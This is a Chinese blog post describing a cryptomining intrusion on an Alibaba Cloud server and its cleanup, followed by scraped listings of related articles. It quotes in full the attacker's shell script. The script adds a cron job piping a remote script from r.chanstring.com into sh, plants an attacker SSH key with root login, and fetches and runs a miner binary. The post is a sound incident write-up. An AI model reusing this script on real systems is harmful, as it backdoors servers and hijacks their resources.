阿里云服务器两次被攻击挖矿经历

记录一下最近被服务器被挖矿的经历,如果有道友有类似的情况可以参考.如果你不知道什么事挖矿请自行谷度一下.

就在写这个的昨天晚上手机短信不断报警某个服务器达到了负载阈值,打开服务器top了一下发现4核CPU被其中一个程序跑满了,先记录下这个程序的PID然后根据PID找到源文件/opt/minerd,kill -9干掉这个进程,然后删掉文件.

1.CPU占用被陌生程序跑满;
2.程序名一般为minerd , yam 等等
3.根据PID找到文件 ll /proc/PID

程序干掉之后没多一会又收到报警,赶紧top一下,挖槽!这哥们有出现了,真是冥顽不化.根据前面找到的路径,发现在/opt目录下又出现了这个可执行文件.看来是用了cron自动生成的,进入cron配置果然发现有一行陌生的curl任务,先保存下这一行然后删掉.

1.一般被挖矿的不会让你轻松的删掉的
2.进入cron会看到一些奇怪的任务
curl -L

用浏览器打开上面的链接发现是一个shell脚本

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/10 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root

if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
	mkdir -p ~/.ssh
	rm -f ~/.ssh/authorized_keys*
	echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
	echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
	echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
	echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
	echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
	/etc/init.d/sshd restart
fi

if [ ! -f "/etc/init.d/ntp" ]; then
	if [ ! -f "/etc/systemd/system/ntp.service" ]; then
		mkdir -p /opt
		curl -fsSL https://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -Install
	fi
fi

# service ntp start
# systemctl restart ntp.service
/etc/init.d/ntp start

# rm -rf /etc/init.d/ntp
# ps auxf|grep -v grep|grep "/usr/sbin/ntp -D"|awk ‘{print $2}‘|xargs kill -9

ps auxf|grep -v grep|grep "/usr/bin/cron"|awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk ‘{print $2}‘|xargs kill -9

有脚本解决起来就方便多了根据脚本内容一行行删掉,一半情况就解决了,但有时即便按照脚本删还是无法解决,就只能用grep批量查关键字,看看还有什么后门没有

egrep -r ‘minerd‘ xxx (xxx是/目录下的个目录)
egrep -r ‘chanstring‘ xxx

一般会查到一些包含这些关键字的文件,然后再一一判断处理吧

时间: 2024-11-13 09:02:37

阿里云服务器两次被攻击挖矿经历的相关文章

阿里云服务器ECS按ctrl+alt+delete无法登录

今天在使用阿里云服务器远程桌面的时候发现怎么也进入不了,远程桌面无法连接,于是想到了在阿里云服务器管理控制台可以使用连接管理终端进行远程桌面连接,下面详细介绍阿里云服务器操作经验. 操作步骤如下 登录阿里云 - 进入云服务器管理控制台 - 管理 - 实例详情 - 下拉框更多 - 找到连接管理终端,如图所示 此时会弹出一个对话框,提示你输入管理终端密码,密码是6位数字,忘记的话可以修改密码.提示:如果持续出现黑屏,说明系统处于休眠状态,按任意键可以激活. 输入6位数字管理终端密码之后成功连接,问题

记录一次阿里云服务器被攻击的经历

  前些天买了阿里云服务器,无奈最近没空登录.安装了tomcat jdk maven mq jenkins 等几个服务后,找了个以前做的项目在上面跑了下,没问题后一周没怎么登录过.然后这几天手机一直收到服务器在异地被登录的消息,想想自己服务器什么也没有,过几天修改下密码就行了吧,结果今天早上又发了条短信,说 服务器 出现了紧急安全事件:挖矿进程. 无语,之后登录上服务器后果然发现cpu占用近乎100%,top命令 查看是哪个进程占用了cpu,之后kill -9 杀死后 过了几秒又重启无奈了啊..

阿里云服务器被挖矿怎么解决

春节刚开始,我们SINE安全,发布了2018年服务器被挖矿的整体安全分析报告.该安全报告主要是以我们去年的整一年的安全数据为基础,对这些服务器的被挖矿的整体情况进行了详细的安全分析,为站长以及一些中小企业公司提出了合理的服务器安全防护建议. 在去年的虚拟币市场中,虽然虚拟币经历了暴跌的情况,但是服务器被挖矿的情况还是持续性的增长趋势,背后是一些***者利用服务器的漏洞以及网站漏洞进行***服务器,拿到服务器权限,在服务器系统里置入***后门进行挖矿. 下面挖矿的安全报告我们来简要的跟大家分享一下

阿里云服务器被挖矿minerd入侵的解决办法

今天老大手机报警 我检查发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了90%多的CPU, 赶紧百度一下,查到几篇文章都有人遇到同样问题 Hu_Wen遇到的和我最相似,下边是他的解决办法 http://blog.csdn.net/hu_wen/article/details/51908597 但我去查看启动的服务,尽然没有 lady 这个服务. 找不到始作俑者,那个minerd进程删掉就又起来了,后来想了个临时办法,先停掉了挖矿的进程 关闭访问挖矿服务器的访问 ip

阿里云服务器被挖矿病毒minerd入侵的解决方法

早晨上班像往常一样对服务器进行例行巡检,发现一台阿里云服务器的CPU的资源占用很高,到底是怎么回事呢,赶紧用top命令查看了一下,发现是一个名为minerd的进程占用了很高的CPU资源,minerd之前听说过,是一种挖矿病毒,没有想到我负责的服务器会中这种病毒啊,赶紧的寻找解决的方法.下面是我把minerd给杀掉的过程,希望对大家有帮助. 步骤如下: 1.关闭访问挖矿服务器的访问 [[email protected]~]# iptables -A INPUT -s xmr.crypto-pool

阿里云服务器搭建经历

前言 转眼间又到了周五,今天暂时想不到什么可以写的,但是又不能浪费了周五这么难得的机会,不写点东西感觉有点罪过啊~~突然想起来以前给某个小公司做了一个留言管理系统,并且部署在阿里云服务器上.所以当时也是倒腾了一下阿里云服务器的搭建,其中也有一些踩坑的经历,想在这里记录一下,顺便也可以温习一下这个过程,同时也希望能够帮助到其他人,避免重复踩坑.好了,废话不多说,直接开始吧. 原材料: 主要需要安装配置mysql.jdk.tomcat.阿里云服务器我选择的是比较主流的Centos7操作系统,其他感觉

阿里云服务器被植入恶意插件解决过程

问题发现: 国庆放假期间公司一台阿里云服务器发现无法正常登陆,报错信息提示22端口未开放.且服务器提供的jenkins服务是正常可以使用的,部分功能缺失,于是登陆阿里云控制台使用远程终端管理登陆服务器,发现输入对的用户名及登陆口令无法登录进系统,而且一直提示让重复登录,无法正常登陆进系统内部,很是困惑,第一次遇到这种奇葩的问题,有种束手无策的感觉. 问题解决经过: 开始联系了阿里云的系统工程师申请技术支持,因目前系统处于无法登录状态,所以将服务器的登录口令及远程密码授权给了阿里云的工程师,下面是

阿里云服务器,数据库热备、暖备、冷备实战-镜像篇(域环境下配置)

阿里云服务器 值得信赖 概述 “数据库镜像”是一种针对数据库高可用性的基于软件的解决方案.其维护着一个数据库的两个相同的副本,这两个副本分别放置在不同的SQL Server数据库实例中.建议使用不同位置的两台服务器来承载.在同一时刻,其中一台上的数据库用于客户端访问,充当“主体服务器”角色:而另一台则根据镜像会话的配置和状态,充当热备份服务器,即“镜像服务器角色”,这两种角色不是绝对的. 优点 l 增强了数据保护功能 l 提高了数据库的可用性 l 提高了生产数据库在升级期间的可用性 工作方式 在

阿里云服务器linux主机如何添加swap分区

为什么要添加Swap分区?swap分区,即交换区,作用为:当系统的物理内存不够用的时候,就需要将物理内存中的一部分空间释放出来,以供当前运行的程序使用.那些被释放的空间可能来自一些很长时间没有什么操作的程序,这些被释放的空间被临时保存到Swap空间中,等到那些程序要运行时,再从Swap中恢复保存的数据到内存中.这样,系统总是在物理内存不够时,才进行Swap交换. 其实,Swap的调整对Linux服务器,特别是Web服务器的性能至关重要.通过调整Swap,有时可以越过系统性能瓶颈,节省系统升级费用